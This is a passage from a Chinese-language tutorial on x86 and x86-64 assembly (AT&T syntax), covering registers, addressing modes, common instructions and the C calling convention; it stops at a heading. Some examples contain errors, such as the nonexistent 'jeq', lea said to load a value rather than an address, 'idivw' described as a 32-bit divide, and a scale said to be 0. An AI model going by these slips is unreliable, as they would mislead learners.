这些寄存器的名字都是有点历史的, 例如 EAX 过去被称为 累加器, 因为它被用来作很多算术运算, 还有 ECX
被称为 计数器 , 因为它被用来保存循环的索引 ( 就是循环次数 ). 尽管大多是寄存器在现代指令集中已经失去了它们的特殊用途, 但是按照惯例, 其中有两个寄存器还是有它们的特殊用途 ---ESP
和 EBP.
对于 EAS
, EBX
, ECX
还有 EDX
寄存器, 它们可以被分段开来使用. 例如, 可以将 EAX
的最低的 2 位字节视为 16 位寄存器 ( AX
). 还可以将 AX
的最低位的 1 个字节看成 8 位寄存器来用 ( AL
), 当然 AX
的高位的 1 个字节也可以看成是一个 8 位寄存器 ( AH
). 这些名称有它们相对应的物理寄存器. 当两个字节大小的数据被放到 DX
的时候, 原本 DH
, DL
和 EDX
的数据会受到影响 ( 被覆盖之类的 ). 这些 " 子寄存器 " 主要来自于比较久远的 16 位版本指令集. 然而, 姜还是老的辣, 在处理小于 32 位的数据的时候, 比如 1 个字节的 ASCII 字符, 它们有时会很方便.
3.3.3 内存和寻址模式 Memory and Addressing Modes
3.3.3.1 声明静态数据区域
你可以用特殊的 x86 汇编指令在内存中声明静态数据区域 ( 类似于全局变量 ). .data
指令用来声明数据. 根据这条指令, .byte
, .short
和 .long
可以分别用来声明 1 个字节, 2 个字节和 4 个字节的数据. 我们可以给它们打个标签, 用来引用创建的数据的地址. 标签在汇编语言中是非常有用的, 它们给内存地址命名, 然后编译器 和链接器 将其 " 翻译 " 成计算机理解的机器代码. 这个跟用名称来声明变量很类似, 但是它遵守一些较低级别的规则. 例如, 按顺序声明的位置将彼此相邻地存储在内存中. 这话也许有点绕, 就是按照顺序打的标签, 这些标签对应的数据也会按照顺序被放到内存中.
一些例子 :
.data
var :
.byte 64 ;声明一个字节型变量 var, 其所对应的数据是64
.byte 10 ;声明一个数据 10, 这个数据没有所谓的 " 标签 ", 它的内存地址就是 var+1.
x :
.short 42 ;声明一个大小为 2 个字节的数据, 这个数据有个标签 " x "
y :
.long 30000 ;声明一个大小为 4 个字节的数据, 这个数据标签是 " y ", y 的值被初始化为 30000
与高级语言不同, 高级语言的数组可以具有多个维度并且可以通过索引来访问, x86 汇编语言的数组只是在内存中连续的" 单元格 ". 你只需要把数值列出来就可以声明一个数组, 比如下面的第一个例子. 对于一些字节型数组的特殊情况, 我们可以使用字符串. 如果要在大多数的内存填充 0, 你可以使用.zero
指令.
例子 :
s :
.long 1, 2, 3 ;声明 3 个大小为 4 字节的数据 1, 2, 3. 内存中 s+8 这个标签所对应的数据就是 3.
barr:
.zero 10 ;从 barr 这个标签的位置开始, 声明 10 个字节的数据, 这些数据被初始化为 0.
str :
.string "hello" ;从 str 这个标签的位置开始, 声明 6 个字节的数据, 即 hello 对应的 ASCII 值, 这最后还跟有一个 nul(0) 字节.
3.3.3.2 内存寻址
现代x86兼容处理器能够寻址高达 2^32 字节的内存 : 内存地址为 32 位宽. 在上面的示例中,我们使用标签来引用内存区域,这些标签实际上被 32 位数据的汇编程序替换,这些数据指定了内存中的地址. 除了支持通过标签(即常数值)引用存储区域之外,x86提供了一种灵活的计算和引用内存地址的方案 :最多可将两个32位寄存器和一个32位有符号常量相加,以计算存储器地址. 其中一个寄存器可以选择预先乘以 2, 4 或 8.
寻址模式可以和许多 x86 指令一起使用 ( 我们将在下一节对它们进行讲解 ). 这里我们用mov
指令在寄存器和内存中移动数据当作例子. 这个指令有两个参数, 第一个是数据的来源, 第二个是数据的去向.
一些mov
的例子 :
mov (%ebx), %eax ;从 EBX 中的内存地址加载 4 个字节的数据到 EAX, 就是把 EBX 中的内容当作标签, 这个标签在内存中对应的数据放到 EAX 中
;后面如果没有说明的话, (%ebx)就表示寄存器ebx中存储的内容
mov %ebx, var(,1) ; 将 EBX 中的 4 个字节大小的数据移动的内存中标签为 var 的地方去.( var 是一个 32 位常数).
mov (%esi, %ebx, 4), %edx ;将内存中标签为 ESI+4*EBX 所对应的 4 个字节大小的数据移动到 EDX中.
一些错误的例子:
mov (%ebx, %ecx, -1), %eax ;这个只能把寄存器中的值加上一遍.
mov %ebx,(%eax, %esi, %edi, 1) ;在地址计算中, 最多只能出现 2 个寄存器, 这里却有 3 个寄存器.
3.3.3.3 操作后缀
通常, 给定内存地址的数据类型可以从引用它的汇编指令推断出来. 例如, 在上面的指令中, 你可以从寄存器操作数的大小来推出其所占的内存大小. 当我们加载一个 32 位的寄存器的时候, 编译器就可以推断出我们用到的内存大小是 4 个字节宽. 当我们将 1 个字节宽的寄存器的值保存到内存中时, 编译器可以推断出我们想要在内存中弄个 1 字节大小的 " 坑 " 来保存我们的数据.
然而在某些情况下, 我们用到的内存中 " 坑 " 的大小是不明确的. 比如说这条指令 mov $2,(%ebx)
. 这条指令是否应该将 " 2 " 这个值移动到 EBX 中的值所代表的地址 " 坑 " 的单个字节中 ? 也许它表示的是将 32 位整数表示的 2 移动到从地址 EBX 开始的 4 字节. 既然这两个解释都有道理, 但计算机汇编程序必须明确哪个解释才是正确的, 计算机很单纯的, 要么是错的要么是对的. 前缀 b, w, 和 l 就是来解决这个问题的, 它们分别表示 1, 2 和 4 个字节的大小.
举几个例子 :
movb $2, (%ebx) ;将 2 移入到 ebx 中的值所表示的地址单元中.
movw $2, (%ebx) ;将 16 位整数 2 移动到 从 ebx 中的值所表示的地址单元 开始的 2 个字节中;这话有点绕, 所以我故意在里面加了点空格, 方便大家理解.
movl $2,(%ebx) ;将 32 位整数 2 移动到 从 ebx中的值表示的地址单元 开始的 4 个字节中.
3.3.4 指令 Instructions
机器指令通常分为 3 类 : 数据移动指令, 逻辑运算指令和流程控制指令. 在本节中, 我们将讲解每一种类型的 x86 指令以及它们的重要示例. 当然, 我们不可能把 x86 所有指令讲得特别详细, 毕竟篇幅和水平有限. 完整的指令列表, 请参阅 intel 的指令集参考手册.
我们将使用以下符号 :
<reg32 任意的 32 位寄存器 (%eax, %ebx, %ecx, %edx, %esi, %edi, %esp 或者 %eb)
<reg16 任意的 16 位寄存器 (%ax, %bx, %cx 或者 %dx)
<reg8 任意的 8 位寄存器 (%ah, %al, %bh, %bl, %ch, %cl, %dh, %dl)
<reg 任意的寄存器
<mem 一个内存地址, 例如 (%eax), 4+var, (%eax, %ebx, 1)
<con32 32 位常数
<con16 16 位常数
<con8 8 位常数
<con 任意 32位, 16 位或者 8 位常数
在汇编语言中, 用作立即操作数 的所有标签和数字常量 ( 即不在诸如3 (%eax, %ebx, 8)
这样的地址计算中 ) 总是以美元符号 $ 为前缀. 需要的时候, 前缀 0x 表示十六进制数, 例如$ 0xABC
. 如果没有前缀, 则默认该数字为十进制数.
3.3.4.1 数据移动指令
mov
移动
mov
指令将数据从它的第一个参数 ( 即寄存器中的内容, 内存单元中的内容, 或者一个常数值 ) 复制到它的第二个参数 ( 即寄存器或者内存单元 ). 当寄存器到寄存器之间的数据移动是可行的时候, 直接地从内存单元中将数据移动到另一内存单元中是不行的. 在这种需要在内存单元中传递数据的情况下, 它数据来源的那个内存单元必须首先把那个内存单元中的数据加载到一个寄存器中, 然后才可以通过这个寄存器来把数据移动到目标内存单元中.
- 语法
mov <reg, <reg
mov <reg, <mem
mov <mem, <reg
mov <con, <reg
mov <con, <mem
- 例子
mov %ebx, %eax ;将 EBX 中的值复制到 EAX 中
mov $5, var(,1) ;将数字 5 存到字节型内存单元 " var "
push
入栈
push
指令将它的参数移动到硬件支持的栈内存顶端. 特别地, push
首先将 ESP 中的值减少 4, 然后将它的参数移动到一个 32 位的地址单元 ( %esp ). ESP ( 栈指针 ) 会随着不断入栈从而持续递减, 即栈内存是从高地址单元到低地址单元增长.
- 语法
push <reg32
push <mem
push <con32
- 例子
push %eax ;将 EAX 送入栈
push var(,1) ;将 var 对应的 4 字节大小的数据送入栈中
pop
出栈
pop
指令从硬件支持的栈内存顶端移除 4 字节的数据, 并把这个数据放到该指令指定的参数中 ( 即寄存器或者内存单元 ). 其首先将内存中 ( %esp ) 的 4 字节数据放到指定的寄存器或者内存单元中, 然后让 ESP + 4.
- 语法
pop <reg32
pop <mem
- 例子
pop %edi ;将栈顶的元素移除, 并放入到寄存器 EDI 中.
pop (%ebx) ;将栈顶的元素移除, 并放入从 EBX 开始的 4 个字节大小的内存单元中.
重点内容 : 栈 栈是一种特殊的存储空间, 特殊在它的访问形式上, 它的访问形式就是最后进入这个空间的数据, 最先出去, 也就是 "先进后出, 后进先出".
lea
加载有效地址
lea
指令将其第一个参数指定的内存单元 放入到 第二个参数指定的寄存器中. 注意, 该指令不加载内存单元中的内容, 只是计算有效地址并将其放入寄存器. 这对于获得指向存储器区域的指针或者执行简单的算术运算非常有用.
也许这里你会看得一头雾水, 不过你不必担心, 这里有更为通俗易懂的解释. 汇编语言中 lea 指令和 mov 指令的区别 ? MOV
指令的功能是传送数据,例如 MOV AX,[1000H]
,作用是将 1000H 作为偏移地址,寻址找到内存单元,将该内存单元中的数据送至 AX; LEA
指令的功能是取偏移地址,例如 LEA AX,[1000H]
,作用是将源操作数 [1000H] 的偏移地址 1000H 送至 AX。理解时,可直接将[ ]去掉,等同于 MOV AX,1000H
。 再如:LEA BX,[AX]
,等同于 MOV BX,AX
;LEA BX,TABLE
等同于 MOV BX,OFFSET TABLE
。 但有时不能直接使用 MOV
代替: 比如:LEA AX,[SI+6]
不能直接替换成:MOV AX,SI+6
;但可替换为: MOV AX,SI
ADD AX,6
两步完成。
- 语法
lea <mem, <reg32
- 例子
lea (%ebx,%esi,8), %edi ;EBX+8*ESI 的值被移入到了 EDI
lea val(,1), %eax ;val 的值被移入到了 EAX
3.3.4.2 逻辑运算指令
add
整数相加
add
指令将两个参数相加, 然后将结果存放到第二个参数中. 注意, 参数可以是寄存器,但参数中最多只有一个内存单元. 这话有点绕, 我们直接看语法 :
- 语法
add <reg, <reg
add <mem, <reg
add <reg, <mem
add <con, <reg
add <con, <mem
- 例子
add $10, %eax ;EAX 中的值被设置为了 EAX+10.
addb $10, (%eax) ;往 EAX 中的值 所代表的内存单元地址 加上 1 个字节的数字 10.
sub
整数相减
sub
指令将第二个参数的值与第一个相减, 就是后面那个减去前面那个, 然后把结果存储到第二个参数. 和add
一样, 两个参数都可以是寄存器, 但两个参数中最多只能有一个是内存单元.
- 语法
sub <reg, <reg
sub <mem, <reg
sub <con, <reg
sub <con, <mem
- 例子
sub %ah, %al ;AL 被设置成 AL-AH
sub $216, %eax ;将 EAX 中的值减去 216
inc, dec
自增, 自减
inc
指令让它的参数加 1, dec
指令则是让它的参数减去 1.
- 语法
inc <reg
inc <mem
dec <reg
dec <mem
- 例子
dec %eax ;EAX 中的值减去 1
incl var(,1) ;将 var 所代表的 32 位整数加上 1.
imul
整数相乘
imul
指令有两种基本格式 : 第一种是 2 个参数的 ( 看下面语法开始两条 ); 第二种格式是 3 个参数的 ( 看下面语法最后两条 ).
2 个参数的这种格式, 先是将两个参数相乘, 然后把结果存到第二个参数中. 运算结果 ( 即第二个参数 ) 必须是一个寄存器.
3 个参数的这种格式, 先是将它的第 1 个参数和第 2 个参数相乘, 然后把结果存到第 3 个参数中, 当然, 第 3 个参数必须是一个寄存器. 此外, 第 1 个参数必须是一个常数.
- 语法
imul <reg32, <reg32
imul <mem, <reg32
imul <con, <reg32, <reg32
imul <con, <mem, <reg32
- 例子
imul (%ebx), %eax ;将 EAX 中的 32 位整数, 与 EBX 中的内容所指的内存单元, 相乘, 然后把结果存到 EAX 中.
imul $25, %edi, %esi ;ESI 被设置为 EDI * 25.
idiv
整数相除
idiv
只有一个操作数,此操作数为除数,而被除数则为 EDX : EAX 中的内容(一个64位的整数), 除法结果 ( 商 ) 存在 EAX 中, 而所得的余数存在 EDX 中.
- 语法
idiv <reg32
idiv <mem
- 例子
idiv %ebx ;用 EDX : EAX 的值除以 EBX 的值. 商存放在 EAX 中, 余数存放在 EDX 中.
idivw (%ebx) ;将 EDX : EAX 的值除以存储在 EBX 所对应内存单元的 32 位值. 商存放在 EAX 中, 余数存放在 EDX 中.
and, or, xor
按位逻辑 与, 或, 异或 运算
这些指令分别对它们的参数进行相应的逻辑运算, 运算结果存到第一个参数中.
- 语法
and <reg, <reg
and <mem, <reg
and <reg, <mem
and <con, <reg
and <con, <mem
or <reg, <reg
or <mem, <reg
or <reg, <mem
or <con, <reg
or <con, <mem
xor <reg, <reg
xor <mem, <reg
xor <reg, <mem
xor <con, <reg
xor <con, <mem
- 例子
and $0x0F, %eax ;只留下 EAX 中最后 4 位数字 (二进制位)
xor %edx, %edx ;将 EDX 的值全部设置成 0
not
逻辑位运算 非
对参数进行逻辑非运算, 即翻转参数中所有位的值.
- 语法
not <reg
not <mem
- 例子
not %eax ;将 EAX 的所有值翻转.
neg
取负指令
取参数的二进制补码负数. 直接看例子也许会更好懂.
- 语法
neg <reg
neg <mem
- 例子
neg %eax ;EAX → -EAX
shl, shr
按位左移或者右移
这两个指令对第一个参数进行位运算, 移动的位数由第二个参数决定, 移动过后的空位拿 0 补上.被移的参数最多可以被移 31 位. 第二个参数可以是 8 位常数或者寄存器 CL. 在任意情况下, 大于 31 的移位都默认是与 32 取模.
- 语法
shl <con8, <reg
shl <con8, <mem
shl %cl, <reg
shl %cl, <mem
shr <con8, <reg
shr <con8, <mem
shr %cl, <reg
shr %cl, <mem
- 例子
shl $1, %eax ;将 EAX 的值乘以 2 (如果最高有效位是 0 的话)
shr %cl, %ebx ;将 EBX 的值除以 2n, 其中 n 为 CL 中的值, 运算最终结果存到 EBX 中.
你也许会想, 明明只是把数字二进制移了 1 位, 结果却是等于这个数字乘以 2.什么情况 ? 这几个位运算的结果和计算机表示数字的原理有关,请看本章附录的计算机数字表示.
3.3.4.3 流程控制指令
x86 处理器有一个指令指针寄存器 ( EIP ), 该寄存器为 32 位寄存器, 它用来在内存中指示我们输入汇编指令的位置. 就是说这个寄存器指向哪个内存单元, 那个单元存储的机器码就是程序执行的指令. 通常它是指向我们程序要执行的 下一条指令. 但是你不能直接操作 EIP 寄存器, 你需要流程控制指令来隐式地给它赋值.
我们使用符号 <label
来当作程序中的标签. 通过输入标签名称后跟冒号, 可以将标签插入 x86 汇编代码文本中的任何位置. 例如 :
mov 8(%ebp), %esi
begin:
xor %ecx, %ecx
mov (%esi), %eax
该代码片段中的第二段被套上了 " begin " 这个标签. 在代码的其它地方, 我们可以用 " begin " 这个标签从而更方便地来引用这段指令在内存中的位置. 这个标签只是用来更方便地表示位置的, 它并不是用来代表某个 32 位值.
-
jmp
跳转指令将程序跳转到参数指定的内存地址, 然后执行该内存地址的指令.
-
语法
jmp <label
- 例子
jmp begin ;跳转到打了 " begin " 这个标签的地方
jcondition
有条件的跳转
这些指令是条件跳转指令, 它们基于一组条件代码的状态, 这些条件代码的状态存放在称为机器状态字 ( machine status word ) 的特殊寄存器中. 机器状态字的内容包括关于最后执行的算术运算的信息. 例如, 这个字的一个位表示最后的结果是否为 0. 另一个位表示最后结果是否为负数. 基于这些条件代码, 可以执行许多条件跳转. 例如, 如果最后一次算术运算结果为 0, 则 jz
指令就是跳转到指定参数标签. 否则, 程序就按照流程进入下一条指令.
许多条件分支的名称都是很直观的, 这些指令的运行, 都和一个特殊的比较指令有关, cmp
( 见下文 ). 例如, 像 jle
和 jne
这种指令, 它们首先对参数进行 cmp
操作.
- 语法
je <label ;当相等的时候跳转
jne <label ;当不相等的时候跳转
jz <label ;当最后结果为 0 的时候跳转
jg <label ;当大于的时候跳转
jge <label ;当大于等于的时候跳转
jl <label ;当小于的时候跳转
jle <label ;当小于等于的时候跳转
- 例子
cmp %ebx, %eax
jle done
;如果 EAX 的值小于等于 EBX 的值, 就跳转到 " done " 标签, 否则就继续执行下一条指令.
cmp
比较指令
比较两个参数的值, 适当地设置机器状态字中的条件代码. 此指令与sub指令类似,但是cmp不用将计算结果保存在操作数中.
- 语法
cmp <reg, <reg
cmp <mem, <reg
cmp <reg, <mem
cmp <con, <reg
- 例子
cmpb $10, (%ebx)
jeq loop
;如果 EBX 的值等于整数常量 10, 则跳转到标签 " loop " 的位置.
call, ret
子程序调用与返回
这两个指令实现子程序的调用和返回. call
指令首先将当前代码位置推到内存中硬件支持的栈内存上 ( 请看 push
指令 ), 然后无条件跳转到标签参数指定的代码位置. 与简单的 jmp
指令不同, call
指令保存了子程序完成时返回的位置. 就是 call
指令结束后, 返回到调用之前的地址.
ret
指令实现子程序的返回. 该指令首先从栈中取出代码 ( 类似于 pop
指令 ). 然后它无条件跳转到检索到的代码位置.
- 语法
call <label
ret
3.3.5 调用约定 Calling Convention
为了方便不同的程序员去分享代码和运行库, 并简化一般子程序的使用, 程序员们通常会遵守一定的约定 ( Calling Convention ). 调用约定是关于如何从例程调用和返回的协议. 例如,给定一组调用约定规则,程序员不需要检查子例程的定义来确定如何将参数传递给该子例程. 此外,给定一组调用约定规则,可以使高级语言编译器遵循规则,从而允许手动编码的汇编语言例程和高级语言例程相互调用.
我们将讲解被广泛使用的 C 语言调用约定. 遵循此约定将允许您编写可从 C ( 和C ++ ) 代码安全地调用的汇编语言子例程, 并且还允许您从汇编语言代码调用 C 函数库.
C 调用约定很大程度上取决于使用硬件支持的栈内存. 它基于 push
, pop
, call
和 ret
指令. 子程序的参数在栈上传递. 寄存器保存在栈中, 子程序使用的局部变量放在栈中. 在大多数处理器上实现的高级过程语言都使用了类似的调用约定.
调用约定分为两组. 第一组规则是面向子例程的调用者 ( Caller ) 的, 第二组规则面向子例程的编写者, 即被调用者 ( Callee ). 应该强调的是, 错误地遵守这些规则会导致程序的致命错误, 因为栈将处于不一致的状态; 因此, 在你自己的子例程中实现调用约定的时候, 务必当心.
将调用约定可视化的一种好方法是, 在子例程执行期间画一个栈内存附近的图. 图 2 描绘了在执行具有三个参数和三个局部变量的子程序期间栈的内容. 栈中描绘的单元都是 32 位内存单元, 因此这些单元的内存地址相隔 4 个字节. 第一个参数位于距基指针 8 个字节的偏移处. 在栈参数的上方 ( 和基指针下方 ), call
指令在这放了返回地址, 从而导致从基指针到第一个参数有额外 4 个字节的偏移量. 当 ret
指令用于从子程序返回时, 它将跳转到栈中的返回地址.
3.3.5.1 调用者约定 Caller Rules
要进行子程序调用, 调用者应该 :
- 在调用子例程之前, 调用者应该保存指定调用者保存 ( Caller-saved )的某些寄存器的内容. 调用者保存的寄存器是 EAX, ECX, EDX. 由于被调用的子程序可以修改这些寄存器, 所以如果调用者在子例程返回后依赖这些寄存器的值, 调用者必须将这些寄存器的值入栈, 然后就可以在子例程返回后恢复它们.
- 要把参数传递给子例程, 你可以在调用之前把参数入栈. 参数的入栈顺序应该是反着的, 就是最后一个参数应该最先入栈. 随着栈内存地址增大, 第一个参数将存储在最低的地址, 在历史上, 这种参数的反转用于允许函数传递可变数量的参数.
- 要调用子例程, 请使用
call
指令. 该指令将返回地址存到栈上, 并跳转到子程序的代码. 这个会调用子程序, 这个子程序应该遵循下面的被调用者约定.
子程序返回后 ( 紧跟调用指令后 ), 调用者可以期望在寄存器 EAX 中找到子例程的返回值. 要恢复机器状态 ( machine state ), 调用者应该 :
- 从栈中删除参数, 这会把栈恢复到调用之前的状态.
- 把 EAX, ECX, EDX 之前入栈的内容给出栈, 调用者可以假设子例程没有修改其它寄存器.
- 例子
下面的代码就是个活生生的例子, 它展示了遵循约定的函数调用. 调用者正在调用一个带有 3 个整数参数的函数 myFunc. 第一个参数是 EAX, 第二个参数是常数 216; 第三个参数位于 EBX 的值所代表的内存地址.
push (%ebx) ;最后一个参数最先入栈
push $216 ;把第二个参数入栈
push %eax ;第一个参数最后入栈
call myFunc ;调用这个函数 ( 假设以 C 语言的模式命名 )
add $12, %esp
注意, 在调用返回后, 调用者使用 add
指令来清理栈内存. 我们栈内存中有 12 个字节 ( 3 个参数, 每个参数 4 个字节 ), 然后栈内存地址增大. 因此, 为了摆脱掉这些参数, 我们可以直接往栈里面加个 12.
myFunc 生成的结果现在可以有用于寄存器 EAX. 调用者保存 ( Caller-saved ) 的寄存器 ( ECX, EDX ) 的值可能已经被修改. 如果调用者在调用之后使用它们,则需要在调用之前将它们保存在堆栈中并在调用之后恢复它们. 说白了就是把栈这个玩意当作临时存放点.
3.3.5.2 被调用者约定 Callee Rules
子例程的定义应该遵循子例程开头的以下规则 :
- 1.将 EBP 的值入栈, 然后用下面的指示信息把 ESP 的值复制到 EBP 中 :
push %ebp
mov %esp, %ebp
这个初始操作保留了基指针 EBP. 按照约定, 基指针作为栈上找到参数和变量的参考点. 当子程序正在执行的时候, 基指针保存了从子程序开始执行是的栈指针值的副本. 参数和局部变量将始终位于远离基指针值的已知常量偏移处. 我们在子例程的开头推送旧的基指针值,以便稍后在子例程返回时为调用者恢复适当的基指针值. 记住, 调用者不希望子例程修改基指针的值. 然后我们把栈指针移动到 EBP 中, 以获取访问参数和局部变量的参考点.
- 2.接下来, 通过在栈中创建空间来分配局部变量. 回想一下, 栈会向下增长, 因此要在栈顶部创建空间, 栈指针应该递减. 栈指针递减的数量取决于所需局部变量的数量和大小. 例如, 如果需要 3 个局部整数 ( 每个 4 字节 ), 则需要将堆栈指针递减 12, 从而为这些局部变量腾出空间 ( 即sub $12, %esp ). 和参数一样, 局部变量将位于基指针的已知偏移处.
- 3.接下来, 保存将由函数使用的 被调用者保存的 ( Callee-saved ) 寄存器的值. 要存储寄存器, 请把它们入栈. 被调用者保存 ( Callee-saved ) 的寄存器是 EBX, EDI 和 ESI ( ESP 和 EBP 也将由调用约定保留, 但在这个步骤中不需要入栈 ).
在完成这 3 步之后, 子例程的主体可以继续. 返回子例程的时候, 必须遵循以下步骤 :
- 将返回值保存在 EAX 中.
- 恢复已经被修改的任何被调用者保存 ( Callee-saved ) 的寄存器 ( EDI 和 ESI ) 的旧值. 通过出栈来恢复它们. 当然应该按照相反的顺序把它们出栈.
- 释放局部变量. 显而易见的法子是把相应的值添加到栈指针 ( 因为空间是通过栈指针减去所需的数量来分配的 ). 事实上呢, 解除变量释放的错误的方法是将基指针中的值移动到栈指针 :
mov %ebp, %esp
. 这个法子有效, 是因为基指针始终包含栈指针在分配局部变量之前包含的值. - 在返回之前, 立即通过把 EBP 出栈来恢复调用者的基指针值. 回想一下, 我们在进入子程序的时候做的第一件事是推动基指针保存它的旧值.
- 最后, 通过执行
ret
指令返回. 这个指令将从栈中找到并删除相应的返回地址 ( call 指令保存的那个 ).
请注意, 被调用者的约定完全被分成了两半, 简直是彼此的镜像. 约定的前半部分适用于函数开头, 并且通常被称为定义函数的序言 ( prologue ) .这个约定的后半部分适用于函数结尾, 因此通常被称为定义函数的结尾 ( epilogue ).
- 例子
这是一个遵循被调用者约定的例子 :
;启动代码部分
.text
;将 myFunc 定义为全局 ( 导出 ) 函数
.globl myFunc
.type myFunc, @function
myFunc :
;子程序序言
push %ebp ;保存基指针旧值
mov %esp, %ebp ;设置基指针新值
sub $4, %esp ;为一个 4 字节的变量腾出位置
push %edi
push %esi ;这个函数会修改 EDI 和 ESI, 所以先给它们入栈
;不需要保存 EBX, EBP 和 ESP
;子程序主体
mov 8(%ebp), %eax ;把参数 1 的值移到 EAX 中
mov 12(%ebp), %esi ;把参数 2 的值移到 ESI 中
mov 16(%ebp), %edi ;把参数 3 的值移到 EDI 中
mov %edi, -4(%ebp) ;把 EDI 移给局部变量
add %esi, -4(%ebp) ;把 ESI 添加给局部变量
add -4(%ebp), %eax ;将局部变量的内容添加到 EAX ( 最终结果 ) 中
;子程序结尾
pop %esi ;恢复寄存器的值
pop %edi
mov %ebp, %esp ;释放局部变量
pop %ebp ;恢复调用者的基指针值
ret
子程序序言执行标准操作, 即在 EBP ( 基指针 ) 中保存栈指针的副本, 通过递减栈指针来分配局部变量, 并在栈上保存寄存器的值.
在子例程的主体中, 我们可以看到基指针的使用. 在子程序执行期间, 参数和局部变量都位于与基指针的常量偏移处. 特别地, 我们注意到, 由于参数在调用子程序之前被放在栈中, 因此它们总是位于栈基指针 ( 即更高的地址 ) 之下. 子程序的第一个参数总是可以在内存地址 ( EBP+8 ) 找到, 第二个参数在 ( EBP+12 ), 第三个参数在 ( EBP+16). 类似地, 由于在设置基指针后分配局部变量, 因此它们总是位于栈上基指针 ( 即较低地址 ) 之上. 特别是, 第一个局部变量总是位于 ( EBP-4 ), 第二个位于 ( EBP-8 ), 以此类推. 这种基指针的常规使用, 让我们可以快速识别函数内部局部变量和参数的使用.
函数结尾基本上是函数序言的镜像. 从栈中恢复调用者的寄存器值, 通过重置栈指针来释放局部变量, 恢复调用者的基指针值, 并用 ret
指令返回调用者中的相应代码位置, 从哪来回哪去.
3.4 x64 汇编基础
3.4.1 导语
x86-64 (也被称为 x64 或者 AMD64) 是 64 位版本的 x86/IA32 指令集. 以下是我们关于 CS107 相关功能的概述.
3.4.2 寄存器 Registers
下图列出了常用的寄存器 ( 16个通用寄存器加上 2 个特殊用途寄存器 ). 每个寄存器都是 64 bit 宽, 它们的低 32, 16, 8 位都可以看成相应的 32, 16, 8 位寄存器, 并且都有其特殊名称. 一些寄存器被设计用来完成某些特殊目的, 比如 %rsp 被用来作为栈指针, %rax 作为一个函数的返回值. 其他寄存器则都是通用的, 但是一般在使用的时候, 还是要取决于调用者 ( Caller-owned )或者被调用者 ( Callee-owned ). 如果函数 binky 调用了 winky, 我们称 binky 为调用者, winky 为被调用者. 例如, 用于前 6 个参数和返回值的寄存器都是被调用者所有的 ( Callee-owned ). 被调用者可以任意使用这些寄存器, 不用任何预防措施就可以随意覆盖里面的内容. 如果 %rax
存着调用者想要保留的值, 则 Caller 必须在调用之前将这个 %rax
的值复制到一个 " 安全 " 的位置. 被调用者拥有的 ( Callee-owned ) 寄存器非常适合一些临时性的使用. 相反, 如果被调用者打算使用调用者所拥有的寄存器, 那么被调用者必须首先把这个寄存器的值存起来, 然后在退出调用之前把它恢复. 调用者拥有的 ( Caller-owned ) 寄存器用于保存调用者的本地状态 ( local state ), 所以这个寄存器需要在进一步的函数调用中被保留下来.
3.4.3 寻址模式 Addressing modes
正由于它的 CISC 特性, X86-64 支持各种寻址模式. 寻址模式是计算要读或写的内存地址的表达式. 这些表达式用作mov
指令和访问内存的其它指令的来源和去路. 下面的代码演示了如何在每个可用的寻址模式中将 立即数 1 写入各种内存位置 :
movl $1, 0x604892 ;直接写入, 内存地址是一个常数
movl $1, (%rax) ;间接写入, 内存地址存在寄存器 %rax 中
movl $1, -24(%rbp) ;使用偏移量的间接写入
;公式 : (address = base %rbp + displacement -24)
movl $1, 8(%rsp, %rdi, 4) ;间接写入, 用到了偏移量和按比例放大的索引 ( scaled-index )
;公式 : (address = base %rsp + displ 8 + index %rdi * scale 4)
movl $1, (%rax, %rcx, 8) ;特殊情况, 用到了按比例放大的索引 ( scaled-index ), 假设偏移量 ( displacement ) 为 0
movl $1, 0x8(, %rdx, 4) ;特殊情况, 用到了按比例放大的索引 ( scaled-index ), 假设基数 ( base ) 为 0
movl $1, 0x4(%rax, %rcx) ;特殊情况, 用到了按比例放大的索引 ( scaled-index ), 假设比例 ( scale ) 为0
3.4.4 通用指令 Common instructions
先说下指令后缀, 之前讲过这里就重温一遍 : 许多指令都有个后缀 ( b, w, l, q ) , 后缀指明了这个指令代码所操纵参数数据的位宽 ( 分别为 1, 2, 4 或 8 个字节 ). 当然, 如果可以从参数确定位宽的时候, 后缀可以被省略. 例如呢, 如果目标寄存器是 %eax, 则它必须是 4 字节宽, 如果是 %ax 寄存器, 则必须是 2 个字节, 而 %al 将是 1 个字节. 还有些指令, 比如 movs
和 movz
有两个后缀 : 第一个是来源参数, 第二个是去路. 这话乍一看让人摸不着头脑, 且听我分析. 例如, movzbl
这个指令把 1 个字节的来源参数值移动到 4 个字节的去路.
当目标是子寄存器 ( sub-registers ) 时, 只有子寄存器的特定字节被写入, 但有一个例外 : 32 位指令将目标寄存器的高 32 位设置为 0.
mov
和 lea
指令
到目前为止, 我们遇到的最频繁的指令就是 mov
, 而它有很多变种. 关于 mov
指令就不多说了, 和之前 32 位 x86 的没什么区别. lea
指令其实也没什么好说的, 上一节都有, 这里就不废话了.
这里写几个比较有意思的例子 :
mov 8(%rsp), %eax ;%eax = 从地址 %rsp + 8 读取的值
lea 0x20(%rsp), %rdi ;%rdi = %rsp + 0x20
lea (%rdi,%rdx,1), %rax ;%rax = %rdi + %rdx
在把较小位宽的数据移动复制到较大位宽的情况下, movs
和 movz
这两个变种指令用于指定怎么样去填充字节, 因为你是一个小东西被移到了一个大空间, 肯定还有地方是空的, 所以空的地方要填起来, 拿 0 或者 符号扩展 ( sign-extend ) 来填充.
movsbl %al, %edx ;把 1 个字节的 %al, 符号扩展 复制到 4 字节的 %edx
movzbl %al, %edx ;把 1 个字节的 %al, 零扩展 ( zero-extend ) 复制到 4 字节的 %edx
有个特殊情况要注意, 默认情况下, 将 32 位值写入寄存器的 mov
指令, 也会将寄存器的高 32 位归零, 即隐式零扩展到位宽 q. 这个解释了诸如 mov %ebx, %ebx
这种指令, 这些指令看起来很奇怪, 但实际上这是用于从 32 位扩展到 64 位. 因为这个是默认的, 所以我们不用显式的 movzlq
指令. 当然, 有一个 movslq
指令也是从 32 位符号扩展到 64 位.
cltq
指令是一个在 %rax 上运行的专用移动指令. 这个没有参数的指令在 %rax 上进行符号扩展, 源位宽为 L, 目标位宽为 q.
cltq ;在 %rax 上运行,将 4 字节 src 符号扩展为 8 字节 dst,用于 movslq %eax,%rax
算术和位运算
